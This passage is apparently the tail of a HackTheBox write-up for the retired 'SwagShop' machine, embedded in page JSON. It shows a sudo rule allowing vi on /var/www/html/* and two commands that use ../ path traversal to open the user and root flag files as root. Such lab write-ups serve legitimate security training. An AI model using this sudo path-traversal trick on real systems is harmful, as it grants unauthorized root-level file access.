960w,\n/static/9f71cc4238ff25cc37651049c7e23580/3f8aa/image-20220812235356430.png 1337w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9f71cc4238ff25cc37651049c7e23580/d9199/image-20220812235356430.png\"\n            alt=\"image-20220812235356430\"\n            title=\"image-20220812235356430\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>However, even analyzing this password hash with hashcat, I couldn’t recover the password.</p>\n<p>Next, I noticed that www-data had the following sudo permission:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">www-data <span class=\"token assign-left variable\">ALL</span><span class=\"token operator\">=</span>NOPASSWD:/usr/bin/vi /var/www/html/*</code></pre></div>\n<p>This allows vi to be run with sudo on files under <code class=\"language-text\">/var/www/html/</code>, but interestingly, using a relative path like the following allows opening any file with root privileges:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> /usr/bin/vi /var/www/html/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/home/haris/user.txt\n$ <span class=\"token function\">sudo</span> /usr/bin/vi /var/www/html/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/<span class=\"token punctuation\">..</span>/root/root.txt</code></pre></div>\n<p>This allowed me to easily obtain all the flags.</p>","fields":{"slug":"/hackthebox-linux-swagshop-en","tagSlugs":["/tag/hack-the-box-en/","/tag/linux-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-08-11","description":"Writeup for the HackTheBox retired machine 'SwagShop'.","tags":["HackTheBox (en)","Linux (en)","EasyBox (en)","English"],"title":"【Easy/Linux】SwagShop Writeup(HackTheBox)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-linux-swagshop-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}